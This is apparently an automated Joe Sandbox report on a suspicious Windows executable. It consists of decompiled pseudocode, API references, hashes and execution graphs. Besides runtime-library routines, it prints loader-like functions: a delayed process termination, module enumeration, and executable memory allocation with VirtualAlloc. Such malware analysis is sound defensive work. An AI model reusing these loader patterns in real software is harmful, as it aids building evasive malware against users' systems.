                          0x0040f0f7
                          0x0040f0fe
                          0x0040f0b8
                          0x0040f0b8
                          0x0040f0bc
                          0x00000000
                          0x0040f0be
                          0x0040f0c3
                          0x0040f0c3
                          0x0040f0bc
                          0x0040f0c8
                          0x0040f0cc
                          0x0040f0d1
                          0x0040f0d9

                          APIs
                          • __getptd.LIBCMT ref: 0040F0A7
                            • Part of subcall function 0040BD70: __getptd_noexit.LIBCMT ref: 0040BD73
                            • Part of subcall function 0040BD70: __amsg_exit.LIBCMT ref: 0040BD80
                          • __getptd.LIBCMT ref: 0040F0BE
                          • __amsg_exit.LIBCMT ref: 0040F0CC
                          • __lock.LIBCMT ref: 0040F0DC
                          Memory Dump Source
                          • Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Similarity
                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                          • String ID:
                          • API String ID: 3521780317-0
                          • Opcode ID: 8ca7ef0c350fca566ba6684c216ff16df0ed23dafa0c33d837cdfb98a3a2b658
                          • Instruction ID: 925462649c196d7ab1147969d9d15b3965408171c252b3ccfbaa8ed3a22b351d
                          • Opcode Fuzzy Hash: 8ca7ef0c350fca566ba6684c216ff16df0ed23dafa0c33d837cdfb98a3a2b658
                          • Instruction Fuzzy Hash: FAF06D32A44B14CAD730BB65D802B8A73A0AF00764F10413FA841BB6D2DB7CAC45CA9E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00408E9F() {
                          				intOrPtr _t5;
                          				intOrPtr _t6;
                          				intOrPtr _t10;
                          				void* _t12;
                          				intOrPtr _t15;
                          				intOrPtr* _t16;
                          				signed int _t19;
                          				signed int _t20;
                          				intOrPtr _t26;
                          				intOrPtr _t27;
                          
                          				_t5 =  *0x446240;
                          				_t26 = 0x14;
                          				if(_t5 != 0) {
                          					if(_t5 < _t26) {
                          						_t5 = _t26;
                          						goto L4;
                          					}
                          				} else {
                          					_t5 = 0x200;
                          					L4:
                          					 *0x446240 = _t5;
                          				}
                          				_t6 = E0040D6BC(_t5, 4);
                          				 *0x445220 = _t6;
                          				if(_t6 != 0) {
                          					L8:
                          					_t19 = 0;
                          					_t15 = 0x418368;
                          					while(1) {
                          						 *((intOrPtr*)(_t19 + _t6)) = _t15;
                          						_t15 = _t15 + 0x20;
                          						_t19 = _t19 + 4;
                          						if(_t15 >= 0x4185e8) {
                          							break;
                          						}
                          						_t6 =  *0x445220;
                          					}
                          					_t27 = 0xfffffffe;
                          					_t20 = 0;
                          					_t16 = 0x418378;
                          					do {
                          						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x445120 + (_t20 >> 5) * 4))));
                          						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
                          							 *_t16 = _t27;
                          						}
                          						_t16 = _t16 + 0x20;
                          						_t20 = _t20 + 1;
                          					} while (_t16 < 0x4183d8);
                          					return 0;
                          				} else {
                          					 *0x446240 = _t26;
                          					_t6 = E0040D6BC(_t26, 4);
                          					 *0x445220 = _t6;
                          					if(_t6 != 0) {
                          						goto L8;
                          					} else {
                          						_t12 = 0x1a;
                          						return _t12;
                          					}
                          				}
                          			}













                          0x00408e9f
                          0x00408ea7
                          0x00408eaa
                          0x00408eb5
                          0x00408eb7
                          0x00000000
                          0x00408eb7
                          0x00408eac
                          0x00408eac
                          0x00408eb9
                          0x00408eb9
                          0x00408eb9
                          0x00408ec1
                          0x00408ec8
                          0x00408ecf
                          0x00408eef
                          0x00408eef
                          0x00408ef1
                          0x00408efd
                          0x00408efd
                          0x00408f00
                          0x00408f03
                          0x00408f0c
                          0x00000000
                          0x00000000
                          0x00408ef8
                          0x00408ef8
                          0x00408f10
                          0x00408f11
                          0x00408f13
                          0x00408f19
                          0x00408f2d
                          0x00408f33
                          0x00408f3d
                          0x00408f3d
                          0x00408f3f
                          0x00408f42
                          0x00408f43
                          0x00408f4f
                          0x00408ed1
                          0x00408ed4
                          0x00408eda
                          0x00408ee1
                          0x00408ee8
                          0x00000000
                          0x00408eea
                          0x00408eec
                          0x00408eee
                          0x00408eee
                          0x00408ee8

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Similarity
                          • API ID: __calloc_crt
                          • String ID: @RD
                          • API String ID: 3494438863-1994911373
                          • Opcode ID: 9501712f4376269ec35644b239256d302f5e92eb67f071fcf933d0219f924180
                          • Instruction ID: cfbf7eaeca6dfb36402b98399007b2dbb8e1c38447a04112b842dd24da090a45
                          • Opcode Fuzzy Hash: 9501712f4376269ec35644b239256d302f5e92eb67f071fcf933d0219f924180
                          • Instruction Fuzzy Hash: 961136317046111BE7249B2DFD412A33282FB86728724063FF510EA3E1EF78C881468C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 88%
                          			E0041614E(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
                          				intOrPtr _t17;
                          				intOrPtr* _t28;
                          				void* _t29;
                          
                          				_t30 = __eflags;
                          				_t28 = __esi;
                          				_t26 = __edx;
                          				_t19 = __ebx;
                          				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
                          				E00415C16(__ebx, __edx, __edi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
                          				 *((intOrPtr*)(E0040BD70(__ebx, __edx, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
                          				_t17 = E0040BD70(_t19, _t26, _t30);
                          				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
                          				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
                          					_t17 =  *((intOrPtr*)(__esi + 0x14));
                          					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
                          						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
                          							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
                          							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
                          								_t17 = E00415BEF(_t37,  *((intOrPtr*)(_t28 + 0x18)));
                          								_t38 = _t17;
                          								if(_t17 != 0) {
                          									_push( *((intOrPtr*)(_t29 + 0x10)));
                          									_push(_t28);
                          									return E00415EE6(_t38);
                          								}
                          							}
                          						}
                          					}
                          				}
                          				return _t17;
                          			}






                          0x0041614e
                          0x0041614e
                          0x0041614e
                          0x0041614e
                          0x00416151
                          0x00416157
                          0x00416165
                          0x0041616b
                          0x00416173
                          0x0041617f
                          0x00416187
                          0x0041618f
                          0x004161a3
                          0x004161a5
                          0x004161a9
                          0x004161ae
                          0x004161b4
                          0x004161b6
                          0x004161b8
                          0x004161bb
                          0x00000000
                          0x004161c2
                          0x004161b6
                          0x004161a9
                          0x004161a3
                          0x0041618f
                          0x004161c3

                          APIs
                            • Part of subcall function 00415C16: __getptd.LIBCMT ref: 00415C1C
                            • Part of subcall function 00415C16: __getptd.LIBCMT ref: 00415C2C
                          • __getptd.LIBCMT ref: 0041615D
                            • Part of subcall function 0040BD70: __getptd_noexit.LIBCMT ref: 0040BD73
                            • Part of subcall function 0040BD70: __amsg_exit.LIBCMT ref: 0040BD80
                          • __getptd.LIBCMT ref: 0041616B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.248589200.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.248582626.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248640451.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248650930.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248656057.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248667674.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.248671620.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Similarity
                          • API ID: __getptd$__amsg_exit__getptd_noexit
                          • String ID: csm
                          • API String ID: 803148776-1018135373
                          • Opcode ID: a935c30cd55411eed2351ce7d8e9c1ad7b12a7df9e4901bfa9168f7baf4b6cfa
                          • Instruction ID: 474831be7a2f2d2468342213cfcbba1cf13fe85f3b37322c86b277925fab3e0f
                          • Opcode Fuzzy Hash: a935c30cd55411eed2351ce7d8e9c1ad7b12a7df9e4901bfa9168f7baf4b6cfa
                          • Instruction Fuzzy Hash: 54012834800705EECF389F25D440AEEB3B5EF50311F15442FE44156792DB38DAC5CA99
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Execution Graph

                          Execution Coverage:6.1%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:19
                          Total number of Limit Nodes:0
                          execution_graph 668 402ad1 669 402ad2 668->669 671 402b56 669->671 672 40180c 669->672 673 40181b 672->673 674 40183e Sleep 673->674 676 401859 674->676 675 40186a NtTerminateProcess 677 401876 675->677 676->675 677->671 682 401818 683 40181b 682->683 684 40183e Sleep 683->684 686 401859 684->686 685 40186a NtTerminateProcess 687 401876 685->687 686->685 688 402a9d 689 402ad2 688->689 690 40180c 2 API calls 689->690 691 402b56 689->691 690->691

                          Callgraph

                          • Executed
                          • Not Executed
                          • Opacity -> Relevance
                          • Disassembly available
                          callgraph 0 Function_00401246 1 Function_00401748 2 Function_00401BC9 3 Function_00402ACE 53 Function_0040180C 3->53 4 Function_004011D0 5 Function_00402AD1 5->53 6 Function_00401DD3 7 Function_00401AD5 8 Function_004011D7 9 Function_00402B58 10 Function_00402DD8 11 Function_00402E59 12 Function_004023DB 13 Function_00402E5C 14 Function_004027DC 15 Function_0040195D 16 Function_0040275E 17 Function_004010DF 18 Function_00402DE2 19 Function_00401064 20 Function_004016E4 21 Function_00402B66 22 Function_00401D66 23 Function_00402F6A 24 Function_0040136B 25 Function_004011EB 26 Function_00402D6E 27 Function_004025EF 28 Function_00402BEF 29 Function_00402E75 30 Function_00402D75 31 Function_00402575 32 Function_004015F5 33 Function_00402DF5 34 Function_00402CF7 35 Function_00402D79 36 Function_004017F9 37 Function_0040187A 38 Function_00402B7A 39 Function_0040157F 40 Function_00402E7F 41 Function_004013FF 42 Function_00401381 43 Function_00402102 44 Function_00401E82 45 Function_00402B82 46 Function_00402E83 47 Function_00401884 48 Function_00401705 49 Function_00402706 50 Function_00401786 51 Function_00401686 52 Function_0040188B 53->42 54 Function_0040138C 55 Function_00401A8C 56 Function_00402993 57 Function_00402E14 58 Function_00401894 59 Function_00402794 60 Function_00402E94 61 Function_00401715 62 Function_00401297 63 Function_00401818 63->42 64 Function_00401898 65 Function_00402E98 66 Function_0040131A 67 Function_0040259B 68 Function_00402A9D 68->53 69 Function_0040281D 70 Function_0040139D 71 Function_00402E20 72 Function_004013A0 73 Function_00401822 73->42 74 Function_00401826 74->42 75 Function_00401427 76 Function_0040212C 77 Function_00401D31 78 Function_00401D32 79 Function_00401CB2 80 Function_00402D33 80->4 81 Function_00401834 81->42 82 Function_00402635 83 Function_00402DB9 84 Function_00401D3D

                          Control-flow Graph

                          C-Code - Quality: 23%
                          			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                          				char _v8;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				void* _t11;
                          				void* _t16;
                          				intOrPtr* _t17;
                          				void* _t19;
                          				void* _t20;
                          				void* _t21;
                          
                          				_t22 = __eflags;
                          				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
                          				_t17 = _a4;
                          				Sleep(0x1388);
                          				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
                          				if(_t11 != 0) {
                          					_push(_a16);
                          					_push(_v8);
                          					_push(_t11);
                          					_push(_t17); // executed
                          					L00401455(0x60, _t19, _t20); // executed
                          				}
                          				 *_t17(0xffffffff, 0); // executed
                          				_t17 = _t17 + 0x60;
                          				_push(0x60);
                          				asm("pushad");
                          				__ecx =  *__esp;
                          				__esp = __esp + 4;
                          				return __eax;
                          			}














                          0x0040180c
                          0x00401839
                          0x0040183e
                          0x00401846
                          0x00401854
                          0x0040185b
                          0x0040185d
                          0x00401860
                          0x00401863
                          0x00401864
                          0x00401865
                          0x00401865
                          0x0040186e
                          0x0040187a
                          0x0040188a
                          0x0040188b
                          0x0040188c
                          0x0040188f
                          0x004018a2

                          APIs
                          • Sleep.KERNELBASE(00001388), ref: 00401846
                          • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                          Memory Dump Source
                          • Source File: 00000001.00000002.344535122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                          Similarity
                          • API ID: ProcessSleepTerminate
                          • String ID:
                          • API String ID: 417527130-0
                          • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                          • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                          • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                          • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • Sleep.KERNELBASE(00001388), ref: 00401846
                          • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                          Memory Dump Source
                          • Source File: 00000001.00000002.344535122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                          Similarity
                          • API ID: ProcessSleepTerminate
                          • String ID:
                          • API String ID: 417527130-0
                          • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                          • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                          • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                          • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 17%
                          			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                          				void* _t11;
                          				intOrPtr* _t17;
                          				void* _t19;
                          				void* _t22;
                          
                          				_t23 = __eflags;
                          				asm("out 0x95, eax");
                          				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
                          				_t17 =  *((intOrPtr*)(_t22 + 8));
                          				Sleep(0x1388);
                          				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                          				if(_t11 != 0) {
                          					_push( *((intOrPtr*)(_t22 + 0x14)));
                          					_push( *((intOrPtr*)(_t22 - 4)));
                          					_push(_t11);
                          					_push(_t17); // executed
                          					L00401455(0x60, _t19, __edi); // executed
                          				}
                          				 *_t17(0xffffffff, 0); // executed
                          				_t17 = _t17 + 0x60;
                          				_push(0x60);
                          				asm("pushad");
                          				__ecx =  *__esp;
                          				__esp = __esp + 4;
                          				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                          				_pop(__edi);
                          				_pop(__esi);
                          				_pop(__ebx);
                          				__esp = __ebp;
                          				_pop(__ebp);
                          				return __eax;
                          			}







                          0x00401822
                          0x00401822
                          0x00401839
                          0x0040183e
                          0x00401846
                          0x00401854
                          0x0040185b
                          0x0040185d
                          0x00401860
                          0x00401863
                          0x00401864
                          0x00401865
                          0x00401865
                          0x0040186e
                          0x0040187a
                          0x0040188a
                          0x0040188b
                          0x0040188c
                          0x0040188f
                          0x00401899
                          0x0040189e
                          0x0040189f
                          0x004018a0
                          0x004018a1
                          0x004018a1
                          0x004018a2

                          APIs
                          • Sleep.KERNELBASE(00001388), ref: 00401846
                          • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                          Memory Dump Source
                          • Source File: 00000001.00000002.344535122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                          Similarity
                          • API ID: ProcessSleepTerminate
                          • String ID:
                          • API String ID: 417527130-0
                          • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                          • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                          • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                          • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 17%
                          			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                          				void* _t8;
                          				void* _t11;
                          				intOrPtr* _t17;
                          				void* _t19;
                          				void* _t22;
                          
                          				_t23 = __eflags;
                          				asm("sbb ebx, ebp");
                          				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
                          				_t17 =  *((intOrPtr*)(_t22 + 8));
                          				Sleep(0x1388);
                          				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                          				if(_t11 != 0) {
                          					_push( *((intOrPtr*)(_t22 + 0x14)));
                          					_push( *((intOrPtr*)(_t22 - 4)));
                          					_push(_t11);
                          					_push(_t17); // executed
                          					L00401455(0x60, _t19, __edi); // executed
                          				}
                          				 *_t17(0xffffffff, 0); // executed
                          				_t17 = _t17 + 0x60;
                          				_push(0x60);
                          				asm("pushad");
                          				__ecx =  *__esp;
                          				__esp = __esp + 4;
                          				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                          				_pop(__edi);
                          				_pop(__esi);
                          				_pop(__ebx);
                          				__esp = __ebp;
                          				_pop(__ebp);
                          				return __eax;
                          			}








                          0x00401826
                          0x00401826
                          0x00401839
                          0x0040183e
                          0x00401846
                          0x00401854
                          0x0040185b
                          0x0040185d
                          0x00401860
                          0x00401863
                          0x00401864
                          0x00401865
                          0x00401865
                          0x0040186e
                          0x0040187a
                          0x0040188a
                          0x0040188b
                          0x0040188c
                          0x0040188f
                          0x00401899
                          0x0040189e
                          0x0040189f
                          0x004018a0
                          0x004018a1
                          0x004018a1
                          0x004018a2

                          APIs
                          • Sleep.KERNELBASE(00001388), ref: 00401846
                          • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                          Memory Dump Source
                          • Source File: 00000001.00000002.344535122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                          Similarity
                          • API ID: ProcessSleepTerminate
                          • String ID:
                          • API String ID: 417527130-0
                          • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                          • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                          • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                          • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 20%
                          			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                          				void* _t10;
                          				void* _t13;
                          				intOrPtr* _t19;
                          				void* _t22;
                          				void* _t25;
                          
                          				_t26 = __eflags;
                          				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
                          				_t19 =  *((intOrPtr*)(_t25 + 8));
                          				Sleep(0x1388);
                          				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
                          				if(_t13 != 0) {
                          					_push( *((intOrPtr*)(_t25 + 0x14)));
                          					_push( *((intOrPtr*)(_t25 - 4)));
                          					_push(_t13);
                          					_push(_t19); // executed
                          					L00401455(0x60, _t22, __edi); // executed
                          				}
                          				 *_t19(0xffffffff, 0); // executed
                          				_t19 = _t19 + 0x60;
                          				_push(0x60);
                          				asm("pushad");
                          				__ecx =  *__esp;
                          				__esp = __esp + 4;
                          				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                          				_pop(__edi);
                          				_pop(__esi);
                          				_pop(__ebx);
                          				__esp = __ebp;
                          				_pop(__ebp);
                          				return __eax;
                          			}








                          0x00401834
                          0x00401839
                          0x0040183e
                          0x00401846
                          0x00401854
                          0x0040185b
                          0x0040185d
                          0x00401860
                          0x00401863
                          0x00401864
                          0x00401865
                          0x00401865
                          0x0040186e
                          0x0040187a
                          0x0040188a
                          0x0040188b
                          0x0040188c
                          0x0040188f
                          0x00401899
                          0x0040189e
                          0x0040189f
                          0x004018a0
                          0x004018a1
                          0x004018a1
                          0x004018a2

                          APIs
                          • Sleep.KERNELBASE(00001388), ref: 00401846
                          • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                          Memory Dump Source
                          • Source File: 00000001.00000002.344535122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                          Similarity
                          • API ID: ProcessSleepTerminate
                          • String ID:
                          • API String ID: 417527130-0
                          • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                          • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                          • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                          • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Execution Graph

                          Execution Coverage:7%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:46.2%
                          Total number of Nodes:13
                          Total number of Limit Nodes:0
                          execution_graph 462 72950d 465 729519 462->465 466 729528 465->466 469 729cb9 466->469 470 729cd4 469->470 471 729cdd CreateToolhelp32Snapshot 470->471 472 729cf9 Module32First 470->472 471->470 471->472 473 729d08 472->473 475 729518 472->475 476 729978 473->476 477 7299a3 476->477 478 7299ec 477->478 479 7299b4 VirtualAlloc 477->479 478->478 479->478

                          Callgraph

                          • Executed
                          • Not Executed
                          • Opacity -> Relevance
                          • Disassembly available
                          callgraph 0 Function_00722171 1 Function_0072AB74 2 Function_0072F575 3 Function_00729978 52 Function_00729A05 3->52 105 Function_00729C8B 3->105 4 Function_0072C078 5 Function_0072BA7E 6 Function_00729C6A 7 Function_0072AB6B 8 Function_0072B86B 9 Function_0072AB69 10 Function_0072F66F 11 Function_0072AC51 12 Function_0072F851 13 Function_0072C157 14 Function_0072AC54 15 Function_00737C55 16 Function_00722055 17 Function_0072A15A 18 Function_0072A05A 19 Function_0072FA58 20 Function_0072FB59 21 Function_0072FA5F 22 Function_0072B65F 23 Function_0072BF5D 24 Function_0072F442 25 Function_0072AA48 26 Function_0072F649 27 Function_0072B24E 28 Function_0072954D 91 Function_00729596 28->91 29 Function_0072F632 30 Function_0072BF33 31 Function_00729630 32 Function_0072B037 33 Function_00729535 33->28 34 Function_0072B03E 35 Function_0072F422 36 Function_0072AC26 37 Function_0072F92B 38 Function_0072B729 39 Function_0072BB29 40 Function_0072C02E 41 Function_0072A412 42 Function_00722210 43 Function_00729617 44 Function_0072B01B 45 Function_00729D18 46 Function_00729519 46->33 85 Function_00729CB9 46->85 47 Function_0072F419 48 Function_0072A71D 49 Function_00729A03 50 Function_0072B303 51 Function_00722207 53 Function_0072FC0B 54 Function_00722008 55 Function_0072FA0E 56 Function_0072AF0C 57 Function_0072950D 57->46 58 Function_0072A5F6 59 Function_0072FBF8 60 Function_00722FE3 61 Function_007298E3 62 Function_0072F9E6 63 Function_0072BEE7 64 Function_0072BEE5 65 Function_0072A5EA 66 Function_0072F5EB 67 Function_0072A6E8 68 Function_0072AEE8 69 Function_0072BAE9 70 Function_0072BDEF 71 Function_0072ACEC 72 Function_0072F8ED 73 Function_007221D5 74 Function_0072BFDA 75 Function_00737CDE 76 Function_0072B6C3 77 Function_0072B3C0 78 Function_0072AFC4 79 Function_0072ABCC 80 Function_00729CB3 80->6 81 Function_0072ABB7 82 Function_0072B4B4 83 Function_0072F5BB 84 Function_00729DB8 85->3 86 Function_007297BE 87 Function_0072A0A2 88 Function_0072AAA7 89 Function_0072B6AD 90 Function_0072F892 91->43 92 Function_0072FA96 93 Function_0072AB94 94 Function_0072F59A 95 Function_0072F898 96 Function_00729A9E 97 Function_0072AA9C 98 Function_0072C09C 99 Function_00729D81 100 Function_0072AB86 101 Function_0072BB84 102 Function_0072BA85 103 Function_0072B38A 104 Function_0072F58A 106 Function_0072A68F 107 Function_00737D8E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 729cb9-729cd2 1 729cd4-729cd6 0->1 2 729cd8 1->2 3 729cdd-729ce9 CreateToolhelp32Snapshot 1->3 2->3 4 729ceb-729cf1 3->4 5 729cf9-729d06 Module32First 3->5 4->5 10 729cf3-729cf7 4->10 6 729d08-729d09 call 729978 5->6 7 729d0f-729d17 5->7 11 729d0e 6->11 10->1 10->5 11->7
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00729CE1
                          • Module32First.KERNEL32(00000000,00000224), ref: 00729D01
                          Memory Dump Source
                          • Source File: 0000000A.00000002.397674421.0000000000722000.00000040.00000020.00020000.00000000.sdmp, Offset: 00722000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_722000_rudwagu.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateFirstModule32SnapshotToolhelp32
                          • String ID:
                          • API String ID: 3833638111-0
                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                          • Instruction ID: 8ae90e93a0a485bd139706e740db5a66e7af6acad873950b8f07e3e9cda1883b
                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                          • Instruction Fuzzy Hash: 17F096316007246BD7203BF9BC8DBAE76ECAF49724F180529E746D14C0DB74EC854671
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 13 729978-7299b2 call 729c8b 16 729a00 13->16 17 7299b4-7299e7 VirtualAlloc call 729a05 13->17 16->16 19 7299ec-7299fe 17->19 19->16
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 007299C9
                          Memory Dump Source
                          • Source File: 0000000A.00000002.397674421.0000000000722000.00000040.00000020.00020000.00000000.sdmp, Offset: 00722000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_722000_rudwagu.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
